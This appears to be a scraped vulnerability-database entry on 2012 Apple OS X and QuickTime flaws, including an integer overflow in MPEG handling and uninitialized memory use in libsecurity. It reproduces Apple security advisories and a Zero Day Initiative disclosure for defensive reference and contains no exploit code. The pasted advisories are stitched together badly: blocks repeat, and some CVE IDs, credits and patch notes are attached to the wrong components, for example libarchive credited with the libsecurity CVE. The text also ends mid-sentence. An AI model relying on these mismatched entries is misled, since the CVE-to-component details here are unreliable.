VARIoT IoT vulnerabilities database

Integer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted MPEG file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within how the application calculates the padding for an MPEG sample. When calculating the padding, the MPEG library will subtract this from another length without checking for underflow. This resulting length will then be used in a memcpy operation into a statically sized buffer allocated on the heap. This can lead to code execution under the context of the application. Apple Mac OS X is prone to an integer-overflow vulnerability that affects the QuickTime component. Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-15-1 QuickTime 7.7.2 QuickTime 7.7.2 is now available and addresses the following: QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: Multiple stack overflows existed in QuickTime's handling of TeXML files. These issues do not affect OS X systems. CVE-ID CVE-2012-0663 : Alexander Gavrun working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A heap overflow existed in QuickTime's handling of text tracks. This issue does not affect OS X systems. CVE-ID CVE-2012-0664 : Alexander Gavrun working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A heap buffer overflow existed in the handling of H.264 encoded movie files. CVE-ID CVE-2012-0665 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Opening a maliciously crafted MP4 encoded file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of MP4 encoded files. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.3. CVE-ID CVE-2011-3458 : Luigi Auriemma and pa_kt both working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An off by one buffer overflow existed in the handling of rdrf atoms in QuickTime movie files. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.3. CVE-ID CVE-2011-3459 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file during progressive download may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of audio sample tables. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.4. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.4. CVE-ID CVE-2012-0659 : An anonymous researcher working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A stack buffer overflow existed in the QuickTime plugin's handling of QTMovie objects. This issue does not affect OS X systems. CVE-ID CVE-2012-0666 : CHkr_D591 working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Processing a maliciously crafted PNG image may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of PNG files. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.3. CVE-ID CVE-2011-3460 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted QTVR movie file may lead to an unexpected application termination or arbitrary code execution Description: A signedness issue existed in the handling of QTVR movie files. This issue does not affect OS X systems. CVE-ID CVE-2012-0667 : Alin Rad Pop working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of JPEG2000 encoded movie files. This issue does not affect systems prior to OS X Lion. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.4. CVE-ID CVE-2012-0661 : Damian Put working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of RLE encoded movie files. CVE-ID CVE-2012-0668 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in QuickTime's handling of Sorenson encoded movie files. This issue does not affect OS X systems. CVE-ID CVE-2012-0669 : Damian Put working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in QuickTime's handling of sean atoms. CVE-ID CVE-2012-0670 : Tom Gallagher (Microsoft) and Paul Bates (Microsoft) working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted .pict file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of .pict files. CVE-ID CVE-2012-0671 : Rodrigo Rubira Branco (twitter.com/bsdaemon) from the Qualys Vulnerability & Malware Research Labs (VMRL) QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Opening a file in a maliciously crafted path may lead to an unexpected application termination or arbitrary code execution Description: A stack buffer overflow existed in QuickTime's handling of file paths. This issue does not affect OS X systems. CVE-ID CVE-2012-0265 : Tielei Wang of Georgia Tech Information Security Center via Secunia SVCRP QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: An integer underflow existed in QuickTime's handling of audio streams in MPEG files. CVE-ID CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability Research (MSVR) QuickTime 7.7.2 may be obtained from the QuickTime Downloads site: http://www.apple.com/quicktime/download/ The download file is named: "QuickTimeInstaller.exe" Its SHA-1 digest is: ed569d62b3f8c24ac8e9aec7275f17cbb14d2124 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJPsobhAAoJEPefwLHPlZEwk/sP/0C8iXVhnG481GbA03CMhKXJ XDooIlCG6YeoeJxGfri/vqlzqcHe3R90K6R89z1dKGU2bWGvtITh95E+WKll++7F hHYq6YC+r/o1cP1SjBi6A3swhN57m1nQZRIEnnIm+nBSxaiHA6xdRSUaK4ighLSA jbOVfu/6NPuGSlgWBPKSISDY2FhL0GH0QVLW/piVtMTrxhizlE7dgieipAPoVvRC SW2W0te7ujo2X167f2GS8EwplUkj/yVeScdr/6HjLkAXIQ1B9RNqTeOdyQZjTxay 32xhZTQ+JfSQzY6VSGoF0bqlK39u5UyzySIKS446OxclYI6xGKSFvTN3nBUwERd+ W+E/4k3Ry4OYEkgZ5yltXO8bJvGZtmpLOkq94Vb4w7EaEgJ452J/YjqCEEbmtAKM 0W9g1jt5av5Hv+vQ7rufR1tJ6CqkIDDr0f3qY+W/F8ZtdA8Bkvm9568d3L1Vlbai zy89w39Z1RTPMLccZEhtd+80f75P+R3n88X5czjXYignrUJbxhM/S8meqQB5GUB9 nJvZtWB1wlACHJ/EKUTv6miK20XE1OukRyvW0o7WWplqBj5KFWvRcV0tovfybGY9 EKwmao4Hwmq+ovJBFLZj/TV6MMxsJjS9qVea/yOlzZCy+6dwok38yyMAqy+m2dLT X2aq0dgzK7qjPx0FRyOx =BPXs -----END PGP SIGNATURE----- . - -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT5261 - -- Disclosure Timeline: 2011-10-21 - Vulnerability reported to vendor 2012-06-06 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Anonymous * pa_kt / twitter.com/pa_kt / e1c14ba6 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT8/PmVVtgMGTo1scAQLKYQgAgqkAX7DnpsYwdzaYJ2Ww1JLCpU7/ilF+ 5S5RwPLiDPtVY79givOAZkpee9+/b5vZd7AKwWJNK2GxXhpMLvXCtn3ODb36eQhf lTlxB8KTsz+jXndo5qbRa6306aug8/PFSAZyVX9shp0/IuIPgScCKAKqoM1NUqRY rfTHfxXWIwinDlcmR8FKy9Dni6BoiRjPJGwuzGLL2ThpFrt3M4fFgXei8lqM3Zdv BWAqzPSXClRbWOQWeIiQW5ObAk0z8E+dbHgNd0XYCTp6sSgIncy/LxEMypLeqhEw UD4kMxZ6exNWCpheDTac6VokNk1Fqt4a817BH1zE4es8t9A3JhVi0Q== =sEem -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

libsecurity in Apple Mac OS X before 10.7.4 accesses uninitialized memory locations during the processing of X.509 certificates, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted certificate. Apple Mac OS X is prone to a remote memory corruption vulnerability that affects the 'libsecurity' component. Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002 OS X Lion v10.7.4 and Security Update 2012-002 is now available and addresses the following: Login Window Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3 Impact: Remote admins and persons with physical access to the system may obtain account information Description: An issue existed in the handling of network account logins. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. See http://support.apple.com/kb/TS4272 for more information on how to securely remove any remaining records. This issue only affects systems running OS X Lion v10.7.3 with users of Legacy File Vault and/or networked home directories. CVE-ID CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State University, Paul Nelson Bluetooth Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A local user may be able to execute arbitrary code with system privileges Description: A temporary file race condition issue existed in blued's initialization routine. CVE-ID CVE-2012-0649 : Aaron Sigel of vtty.com curl Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. curl disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by enabling empty fragments. CVE-ID CVE-2011-3389 : Apple curl Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Using curl or libcurl with a maliciously crafted URL may lead to protocol-specific data injection attacks Description: A data injection issue existed in curl's handling of URLs. This issue is addressed through improved validation of URLs. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0036 Directory Service Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: A remote attacker may obtain sensitive information Description: Multiple issues existed in the directory server's handling of messages from the network. By sending a maliciously crafted message, a remote attacker could cause the directory server to disclose memory from its address space, potentially revealing account credentials or other sensitive information. This issue does not affect OS X Lion systems. The Directory Server is disabled by default in non-server installations of OS X. CVE-ID CVE-2012-0651 : Agustin Azubel HFS Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Mounting a maliciously crafted disk image may lead to a system shutdown or arbitrary code execution Description: An integer underflow existed in the handling of HFS catalog files. CVE-ID CVE-2012-0642 : pod2g ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in ImageIO's handling of CCITT Group 4 encoded TIFF files. This issue does not affect OS X Lion systems. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html CVE-ID CVE-2011-2692 CVE-2011-3328 ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libtiff's handling of ThunderScan encoded TIFF images. This issue is addressed by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167 Kernel Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: When FileVault is used, the disk may contain unencrypted user data Description: An issue in the kernel's handling of the sleep image used for hibernation left some data unencrypted on disk even when FileVault was enabled. This issue is addressed through improved handling of the sleep image, and by overwriting the existing sleep image when updating to OS X v10.7.4. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3212 : Felix Groebert of Google Security Team libarchive Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in the handling of tar archives and iso9660 files. CVE-ID CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme Prado of Conselho da Justica Federal, Ryan Sleevi of Google libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Support for X.509 certificates with insecure-length RSA keys may expose users to spoofing and information disclosure Description: Certificates signed using RSA keys with insecure key lengths were accepted by libsecurity. This issue is addressed by rejecting certificates containing RSA keys less than 1024 bits. These issues are addressed by applying the relevant upstream patches. CVE-ID CVE-2011-1944 : Chris Evans of Google Chrome Security Team CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-3919 : Juri Aedla LoginUIFramework Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: If the Guest user is enabled, a user with physical access to the computer may be able to log in to a user other than the Guest user without entering a password Description: A race condition existed in the handling of Guest user logins. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0656 : Francisco Gomez (espectalll123) PHP Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Multiple vulnerabilities in PHP Description: PHP is updated to version 5.3.10 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2011-4566 CVE-2011-4885 CVE-2012-0830 Quartz Composer Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A user with physical access to the computer may be able to cause Safari to launch if the screen is locked and the RSS Visualizer screen saver is used Description: An access control issue existed in Quartz Composer's handling of screen savers. This issue is addressed through improved checking for whether or not the screen is locked. CVE-ID CVE-2012-0657 : Aaron Sigel of vtty.com QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file during progressive download may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of audio sample tables. CVE-ID CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of MPEG files. CVE-ID CVE-2012-0659 : An anonymous researcher working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: A buffer underflow existed in the handling of MPEG files. CVE-ID CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability Research QuickTime Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of JPEG2000 encoded movie files. This issue does not affect systems prior to OS X Lion. These issues do not affect OS X Lion systems. CVE-ID CVE-2012-0870 : Andy Davis of NGS Secure CVE-2012-1182 : An anonymous researcher working with HP's Zero Day Initiative Security Framework Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework. Processing untrusted input with the Security framework could result in memory corruption. This issue does not affect 32-bit processes. CVE-ID CVE-2012-0662 : aazubel working with HP's Zero Day Initiative Time Machine Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may access a user's Time Machine backup credentials Description: The user may designate a Time Capsule or remote AFP volume attached to an AirPort Base Station to be used for Time Machine backups. Beginning with AirPort Base Station and Time Capsule Firmware Update 7.6, Time Capsules and Base Stations support a secure SRP-based authentication mechanism over AFP. However, Time Machine did not require that the SRP-based authentication mechanism was used for subsequent backup operations, even if Time Machine was initially configured or had ever contacted a Time Capsule or Base Station that supported it. An attacker who is able to spoof the remote volume could gain access to user's Time Capsule credentials, although not backup data, sent by the user's system. This issue is addressed by requiring use of the SRP-based authentication mechanism if the backup destination has ever supported it. CVE-ID CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc. X11 Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Applications that use libXfont to process LZW-compressed data may be vulnerable to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libXfont's handling of LZW-compressed data. This issue is addressed by updating libXfont to version 1.4.4. CVE-ID CVE-2011-2895 : Tomas Hoger of Red Hat Note: Additionally, this update filters dynamic linker environment variables from a customized environment property list in the user's home directory, if present. OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either Security Update 2012-002 or OS X v10.7.4. For OS X Lion v10.7.3 The download file is named: MacOSXUpd10.7.4.dmg Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36 For OS X Lion v10.7 and v10.7.2 The download file is named: MacOSXUpdCombo10.7.4.dmg Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f For OS X Lion Server v10.7.3 The download file is named: MacOSXServerUpd10.7.4.dmg Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2 For OS X Lion Server v10.7 and v10.7.2 The download file is named: MacOSXServerUpdCombo10.7.4.dmg Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240 For Mac OS X v10.6.8 The download file is named: SecUpd2012-002Snow.dmg Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-002.dmg Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPqtkzAAoJEGnF2JsdZQeee2MIAKAcBIY6k0LU2fDLThFoAgKh WkYpGmCwa7L6n02geHzWrUCK/P/0yGWzDDqLfKlKuKbXdEIRP2wZTlvrqZHLzNO/ nXgz3HN1Xbll8yVXrGMEsoTD23Q+2/ZKLGMlSDw3vgBTVi/g4Rcer4Eew5mTkaoA j4WkrzgVUIxCMrsWMMwu1SVaizBuTYbNVzCzV3JPF1H0zVtVKgwWjhTdOJ/RDksD sjZG1XIEqVyv1rNk5BtjxVPFaJGpf9mcHiH8XyKQ0bC6ToM2r3B++Layoc5k1K0V OxKGSfWOEbWi/KR6vlXyVbe7JnU7a/V0C25HXhnoMEtoTCleZACEByLVtBC87LU= =6Eiz -----END PGP SIGNATURE-----

The directory server in Directory Service in Apple Mac OS X 10.6.8 allows remote attackers to obtain sensitive information from process memory via a crafted message. Apple Mac OS X is prone to multiple information-disclosure vulnerabilities. Attackers can leverage these issues to gain access to sensitive information. Information obtained may aid in further attacks. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002 OS X Lion v10.7.4 and Security Update 2012-002 is now available and addresses the following: Login Window Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3 Impact: Remote admins and persons with physical access to the system may obtain account information Description: An issue existed in the handling of network account logins. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. See http://support.apple.com/kb/TS4272 for more information on how to securely remove any remaining records. This issue only affects systems running OS X Lion v10.7.3 with users of Legacy File Vault and/or networked home directories. CVE-ID CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State University, Paul Nelson Bluetooth Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A local user may be able to execute arbitrary code with system privileges Description: A temporary file race condition issue existed in blued's initialization routine. CVE-ID CVE-2012-0649 : Aaron Sigel of vtty.com curl Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. curl disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by enabling empty fragments. CVE-ID CVE-2011-3389 : Apple curl Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Using curl or libcurl with a maliciously crafted URL may lead to protocol-specific data injection attacks Description: A data injection issue existed in curl's handling of URLs. This issue is addressed through improved validation of URLs. This issue does not affect systems prior to OS X Lion. This issue does not affect OS X Lion systems. The Directory Server is disabled by default in non-server installations of OS X. CVE-ID CVE-2012-0651 : Agustin Azubel HFS Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Mounting a maliciously crafted disk image may lead to a system shutdown or arbitrary code execution Description: An integer underflow existed in the handling of HFS catalog files. CVE-ID CVE-2012-0642 : pod2g ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in ImageIO's handling of CCITT Group 4 encoded TIFF files. This issue does not affect OS X Lion systems. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html CVE-ID CVE-2011-2692 CVE-2011-3328 ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libtiff's handling of ThunderScan encoded TIFF images. This issue is addressed by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167 Kernel Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: When FileVault is used, the disk may contain unencrypted user data Description: An issue in the kernel's handling of the sleep image used for hibernation left some data unencrypted on disk even when FileVault was enabled. This issue is addressed through improved handling of the sleep image, and by overwriting the existing sleep image when updating to OS X v10.7.4. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3212 : Felix Groebert of Google Security Team libarchive Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in the handling of tar archives and iso9660 files. CVE-ID CVE-2011-1777 CVE-2011-1778 libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Verifying a maliciously crafted X.509 certificate, such as when visiting a maliciously crafted website, may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of X.509 certificates. CVE-ID CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme Prado of Conselho da Justica Federal, Ryan Sleevi of Google libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Support for X.509 certificates with insecure-length RSA keys may expose users to spoofing and information disclosure Description: Certificates signed using RSA keys with insecure key lengths were accepted by libsecurity. This issue is addressed by rejecting certificates containing RSA keys less than 1024 bits. CVE-ID CVE-2012-0655 libxml Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution Description: Multiple vulnerabilities existed in libxml, the most serious of which may lead to an unexpected application termination or arbitrary code execution. These issues are addressed by applying the relevant upstream patches. CVE-ID CVE-2011-1944 : Chris Evans of Google Chrome Security Team CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-3919 : Juri Aedla LoginUIFramework Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: If the Guest user is enabled, a user with physical access to the computer may be able to log in to a user other than the Guest user without entering a password Description: A race condition existed in the handling of Guest user logins. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0656 : Francisco Gomez (espectalll123) PHP Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Multiple vulnerabilities in PHP Description: PHP is updated to version 5.3.10 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2011-4566 CVE-2011-4885 CVE-2012-0830 Quartz Composer Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A user with physical access to the computer may be able to cause Safari to launch if the screen is locked and the RSS Visualizer screen saver is used Description: An access control issue existed in Quartz Composer's handling of screen savers. This issue is addressed through improved checking for whether or not the screen is locked. CVE-ID CVE-2012-0657 : Aaron Sigel of vtty.com QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file during progressive download may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of audio sample tables. CVE-ID CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of MPEG files. CVE-ID CVE-2012-0659 : An anonymous researcher working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: A buffer underflow existed in the handling of MPEG files. CVE-ID CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability Research QuickTime Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of JPEG2000 encoded movie files. This issue does not affect systems prior to OS X Lion. By sending a maliciously crafted packet, an unauthenticated remote attacker could cause a denial of service or arbitrary code execution with system privileges. These issues do not affect 